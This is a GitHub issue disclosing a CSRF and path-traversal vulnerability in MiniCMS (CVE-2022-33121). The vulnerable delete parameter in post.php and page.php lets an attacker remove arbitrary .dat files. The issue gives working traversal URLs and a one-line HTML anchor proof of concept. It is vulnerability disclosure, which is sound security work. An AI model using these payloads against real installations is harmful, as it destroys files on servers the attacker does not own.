Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is CSRF vulnerabilities that can lead to deleting local .dat files #45

Closed
youki992 opened this issue Jun 11, 2022 · 2 comments
Closed

Comments

@youki992
Copy link

youki992 commented Jun 11, 2022

Software Link : https://github.com/bg5sbk/MiniCMS After the installation is complete, log in as administrator, open the page

In post.php, user can delete any local .dat files without filter

XgVxl6.png

Create 1.dat in the parent directory

XgZ9mD.png

To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=

Also you can delete any .dat file like local google chrome file

XgZPTH.png

http://127.0.0.1:80/MiniCMS-master/mc-admin/page.php?delete=../../../../../../../../opt/google/chrome/icudtl&state=delete&date=&tag=

Here is CSRF POC test.html: Log in and click the link in test.html, modify the parameter of delete and users will delete the .dat file in the specified directory at last.

<a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a>
@youki992 youki992 changed the title There are two CSRF vulnerabilities that can lead to deleting local .dat files There is CSRF vulnerabilities that can lead to deleting local .dat files Jun 11, 2022
@youki992
Copy link
Author

use CVE-2022-33121

@youki992
Copy link
Author

close

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant